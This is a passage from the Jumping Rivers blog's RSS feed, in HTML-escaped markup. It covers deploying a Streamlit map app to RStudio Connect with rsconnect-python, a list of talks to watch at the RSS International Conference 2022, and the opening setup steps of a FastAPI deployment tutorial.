&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Deck(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; map_style&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;mapbox://styles/mapbox/light-v9&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; initial_view_state&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ViewState(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; latitude&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;33.7783&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; longitude&lt;span style="color:#ff7b72;font-weight:bold"&gt;=-&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;118.253&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zoom&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pitch&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; layers&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pdk&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;Layer(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;HexagonLayer&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; get_position&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;[longitude, latitude]&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; radius&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;500&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;medprice&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elevation_scale&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; elevation_range&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1000&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pickable&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; extruded&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To test this app you can run it locally with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;streamlit run streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will automatically open up a window displaying the app.&lt;/p&gt;
&lt;p&gt;&lt;img alt="streamlit demo app" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/streamlit_housing.png" width="741"&gt;&lt;/p&gt;
&lt;p&gt;One of the nice things about Streamlit is it makes it really easy to view our app as we create it. If you navigate to &amp;ldquo;Settings&amp;rdquo; from the top right menu and tick &amp;ldquo;Run on save&amp;rdquo;, the app will now be updated every time the source script is saved.&lt;/p&gt;
&lt;p&gt;Here we have used the Plotly plotting library but the Streamlit API also enables plotting with other libraries such as &lt;a href="http://docs.bokeh.org/en/latest/" rel="external"&gt;Bokeh&lt;/a&gt; and &lt;a href="https://matplotlib.org/" rel="external"&gt;Matplotlib&lt;/a&gt;.
The API documentation can be found &lt;a href="https://docs.streamlit.io/library/api-reference" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="deploying-to-rstudio-connect"&gt;Deploying to RStudio Connect&lt;/h3&gt;
&lt;p&gt;In order to deploy our Streamlit app to RStudio Connect, we first of all need to install &lt;code&gt;rsconnect-python&lt;/code&gt; with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pipenv install rsconnect-python
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you have not done so already, you will need to add the server which you wish to deploy to. The first step is to create an API key. Log into RStudio Connect and click on your user icon in the top left corner, navigate to &amp;ldquo;API Keys&amp;rdquo; and add a new API key.&lt;/p&gt;
&lt;p&gt;&lt;img alt="user menu icon" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/menu.png" width="1003"&gt;&lt;/p&gt;
&lt;p&gt;Remember to save the API key somewhere as it will only be shown to you once!&lt;/p&gt;
&lt;p&gt;It is also useful to set an API key environment variable in a &lt;code&gt;.env&lt;/code&gt; file. This can be done by running&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;echo &lt;span style="color:#a5d6ff"&gt;&amp;#39;export CONNECT_API_KEY=&amp;lt;your_api_key&amp;gt;&amp;#39;&lt;/span&gt; &amp;gt;&amp;gt; .env
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .env
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you wish, you could also add an environment variable for the server you are using,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;CONNECT_SERVER&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&amp;lt;your server url&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note the server url will be the part of the url that comes before &lt;code&gt;connect/&lt;/code&gt; and must include a trailing slash.&lt;/p&gt;
&lt;p&gt;Now we can add the server with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect add --server &lt;span style="color:#79c0ff"&gt;$CONNECT_SERVER&lt;/span&gt; --name &amp;lt;server nickname&amp;gt; --api-key &lt;span style="color:#79c0ff"&gt;$CONNECT_API_KEY&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check the server has been added and view its details with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect list
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Before we deploy our app, there is one more thing to watch out for. Unless you have a &lt;code&gt;requirements.txt&lt;/code&gt; file in the same directory as your app, RStudio Connect will freeze your current environment. Therefore, make sure you run the deploy command from the virtual environment which you created your Streamlit app in and wish it to run in on the server.&lt;/p&gt;
&lt;p&gt;We are now ready to deploy our streamlit app by running,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect deploy streamlit -n &amp;lt;server nickname&amp;gt; . --entrypoint streamlit_housing.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;from the &lt;code&gt;streamlit-deploy-demo&lt;/code&gt; directory. The &lt;code&gt;--entrypoint&lt;/code&gt; flag in the command above tells RStudio Connect where our app is located. For Streamlit the entrypoint is just the name of the file which contains our app.&lt;/p&gt;
&lt;p&gt;Congrats, your streamlit app has been deployed! You can check it by following the output link to RStudio Connect.&lt;/p&gt;
&lt;h2 id="further-reading"&gt;Further reading&lt;/h2&gt;
&lt;p&gt;We hope you found this post useful!&lt;/p&gt;
&lt;p&gt;If you wish to learn more about Streamlit or deploying applications to RStudio Connect you may be interested in the following links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.streamlit.io/library/get-started/create-an-app" rel="external"&gt;Streamlit tutorial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.rstudio.com/connect/user/publishing/" rel="external"&gt;Publishing to RStudio Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-posit-connect-deployment-management/" rel="external"&gt;Introduction to RStudio Connect course&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Talks to watch at the RSS International Conference</title><link>https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/</link><pubDate>Tue, 06 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://rss.org.uk/training-events/conference2022/" rel="external"&gt;RSS International Conference 2022&lt;/a&gt; is happening next week from 12-15 September 2022, hosted in Aberdeen for the first time! Jumping Rivers are exhibiting at the conference, as well as delivering workshops and talks. These are a couple of the sessions we&amp;rsquo;re looking forward to the most!&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;h3 id="spatial-modelling-and-visualisation-using-r-and-inla"&gt;Spatial modelling and visualisation using R and INLA&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36341&amp;s=1050" rel="external"&gt;workshop&lt;/a&gt; by Dr. Paula Moraga focuses on spatial data. Among other things, you&amp;rsquo;ll learn how to fit models, create static and interactive visualizations, and build Shiny apps to communicate your results.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Wednesday, 14 September, 2022. 09:00-11:50.&lt;/p&gt;
&lt;h3 id="teaching-ethics-and-responsible-communication-of-statistics-and-models"&gt;Teaching ethics and responsible communication of statistics and models&lt;/h3&gt;
&lt;p&gt;Training is a big part of what we do at Jumping Rivers, and so we&amp;rsquo;re always excited to hear about other people&amp;rsquo;s teaching practices. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=45003&amp;s=2018" rel="external"&gt;session&lt;/a&gt;, featuring three different talks, the focus is on actionable ways to include the topic of ethics in data science when delivering statistical training.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Thursday, 15 September, 2022. 14:00-15:00.&lt;/p&gt;
&lt;h3 id="data-science-in-industry---an-introduction-to-mlops"&gt;Data Science in Industry - an introduction to MLOps&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36314&amp;s=1282" rel="external"&gt;session&lt;/a&gt; will bring leading voices in MLOps to discuss what data scientists need to know about MLOps, and how those working in data science can collaborate with their engineering and ops colleagues.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 11:40-13:00.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-rss-international-conference-talks-to-watch"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="jumping-rivers-talks-and-events"&gt;Jumping Rivers Talks and Events&lt;/h2&gt;
&lt;h3 id="early-career-researcher-pre-conference-workshop"&gt;Early Career Researcher pre-conference workshop&lt;/h3&gt;
&lt;p&gt;Nicola will be delivering a talk in the presentation skills workshop as part of the Early Career Researcher pre-conference &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36304&amp;s=209" rel="external"&gt;workshop&lt;/a&gt;, organised by the Young Statisticians Section. Her talk will discuss how to give better technical presentations.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Monday, 12 September, 2022. 14:45-15:45.&lt;/p&gt;
&lt;h3 id="share-your-models-with-r-plumber-apis"&gt;Share your Models with R {plumber} APIs&lt;/h3&gt;
&lt;p&gt;In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/submission/307" rel="external"&gt;talk&lt;/a&gt;, Rhian will introduce what an API is, how the {plumber} package works and show you how to share the statistical models you develop with the world.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 14:00-15:20.&lt;/p&gt;
&lt;h3 id="a-quality-improvement-approach-to-assessing-knowledge-exchange"&gt;A quality improvement approach to assessing Knowledge Exchange&lt;/h3&gt;
&lt;p&gt;Our CEO, Esther, will be on a &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36312&amp;s=1482" rel="external"&gt;panel&lt;/a&gt; discussing the collaboration between universities and external partners, and how this contributes to Knowledge Exchange (KE) - a vital function of universities in ensuring their knowledge can be used for the benefit of the economy and society.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Tuesday, 13 September, 2022. 14:00-15:20.&lt;/p&gt;
&lt;h3 id="dont-panic-the-ambassadors-guide-to-communicating-statistics"&gt;Don&amp;rsquo;t Panic! The Ambassadors guide to communicating statistics&lt;/h3&gt;
&lt;p&gt;Communication is a big part of what we do at Jumping Rivers. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/session/36351" rel="external"&gt;session&lt;/a&gt;, Rhian will be sharing some of the tricks she&amp;rsquo;s learnt from teaching programming - and how these can be applied to communicating statistical concepts more broadly. This group session will actively engage the audience through a number of exercises to stretch attendees’ communication skills.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Wednesday, 14 September, 2022. 10:50-11:50.&lt;/p&gt;
&lt;h3 id="reproducible-data-reports-with-quarto"&gt;Reproducible data reports with Quarto&lt;/h3&gt;
&lt;p&gt;In this hands-on &lt;a href="https://virtual.oxfordabstracts.com/#/event/2726/program?session=36392&amp;s=209" rel="external"&gt;workshop&lt;/a&gt;, Rhian and Nicola will show you how to make reproducible reports using Quarto (the next-generation RMarkdown). Quarto allows users to keep their code and data integrated as they write reports. This means that, with just a click of a button, you can automatically update plots, tables and text when your data changes. In this workshop, we&amp;rsquo;ll show you how.&lt;/p&gt;
&lt;p&gt;Since this session will be interactive, if you&amp;rsquo;re coming along, please bring a laptop with internet access with you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;When&lt;/strong&gt;: Thursday, 15 September, 2022. 15:20-16:40.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;ll also be exhibiting at the conference, so please come and say hello to us!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rss-international-conference-talks-to-watch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python API deployment with RStudio Connect: FastAPI</title><link>https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/</link><pubDate>Thu, 01 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-api-deployment-with-rstudio-connect-fastapi/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-api-deployment-rstudio-flask/" rel="external"&gt;Part 1: Python API deployment with RStudio Connect: Flask&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Python API deployment with RStudio Connect: FastAPI (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/python-app-deployment-with-rstudio-connect-streamlit" rel="external"&gt;Part 3: Python API deployment with RStudio Connect: Streamlit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; is a platform which is well known for providing the ability to deploy and share R applications such as &lt;a href="https://shiny.rstudio.com/" rel="external"&gt;Shiny&lt;/a&gt; apps and &lt;a href="https://www.rplumber.io/" rel="external"&gt;Plumber&lt;/a&gt; APIs, as well as plots, models and &lt;a href="https://rmarkdown.rstudio.com/" rel="external"&gt;R Markdown&lt;/a&gt; reports. However, despite the name, it is not just for R developers. RStudio Connect also supports a growing number of Python applications, including &lt;a href="https://flask.palletsprojects.com/en/2.1.x/" rel="external"&gt;Flask&lt;/a&gt; and &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;FastAPI is a light web framework and as you can probably tell by the name, it&amp;rsquo;s fast. It provides a similar functionality to Flask in that it allows the building of web applications and APIs, however it is newer and uses the &lt;a href="https://asgi.readthedocs.io/en/latest/" rel="external"&gt;ASGI&lt;/a&gt; (Asynchronous Server Gateway Interface) framework. One of the nice features of FastAPI is it is built on &lt;a href="https://www.openapis.org/" rel="external"&gt;OpenAPI&lt;/a&gt; and JSON Schema standards which means it has the ability to provide automatic interactive API documentation with &lt;a href="https://swagger.io/tools/swagger-ui/" rel="external"&gt;SwaggerUI&lt;/a&gt;. You also get validation for most Python data types with Pydantic. FastAPI is therefore another popular choice for data scientists when creating APIs to interact with and visualize data.&lt;/p&gt;
&lt;p&gt;In this blog post we will go through how to deploy a simple machine learning API to RStudio Connect.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-python-api-deployment-with-rstudio-connect-fastapi"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="first-steps"&gt;First steps&lt;/h3&gt;
&lt;p&gt;First of all we need to create a project directory and install FastAPI. Unlike Flask, FastAPI doesn&amp;rsquo;t have an inbuilt web server implementation. Therefore, in order to run our app locally, we will also need to install an ASGI server such as &lt;a href="https://www.uvicorn.org/" rel="external"&gt;uvicorn&lt;/a&gt;,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create a project repo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir fastapi-rsconnect-blog &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; cd fastapi-rsconnect-blog
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create and source a new virtual environment &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv .venv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source .venv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# install FastAPI and uvicorn&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install fastapi
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install &lt;span style="color:#a5d6ff"&gt;&amp;#34;uvicorn[standard]&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Lets start with a basic &amp;ldquo;hello world&amp;rdquo; app which we will create in a file called &lt;code&gt;fastapi_hello.py&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;touch fastapi_hello.py
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our hello world app in FastAPI will look something something like,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# fastapi_hello.py&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;fastapi&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; FastAPI
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Create a FastAPI instance&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; FastAPI()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app.get&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;root&lt;/span&gt;():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; {&lt;span style="color:#a5d6ff"&gt;&amp;#34;message&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello World&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can be run with,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uvicorn fastapi_hello:app --reload
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You will get an output with the link to where your API is running.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;INFO: Uvicorn running on http://127.0.0.1:8000 &lt;span style="color:#ff7b72;font-weight:bold"&gt;(&lt;/span&gt;Press CTRL+C to quit&lt;span style="color:#ff7b72;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can check it is working by navigating to &lt;a href="http://127.0.0.1:8000" rel="external"&gt;http://127.0.0.1:8000&lt;/a&gt; in your browser.&lt;/p&gt;
&lt;h3 id="example-ml-api"&gt;Example ML API&lt;/h3&gt;
&lt;p&gt;Now for a slightly more relevant example! In the pipeline of a data science project, a crucial step is often deploying your model so that it can be used in production. In this example we will use a simple API which allows access to the predictions of a model. Details on the model and creating APIs with FastAPI are beyond the scope of this blog, however this allows for a more interesting demo than &amp;ldquo;hello world&amp;rdquo;. If you are getting started with FastAPI this &lt;a href="https://fastapi.tiangolo.com/tutorial/" rel="external"&gt;tutorial&lt;/a&gt; covers most of the basics.&lt;/p&gt;
&lt;p&gt;We will need to install a few more packages in order to run this example.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install scikit-learn joblib numpy
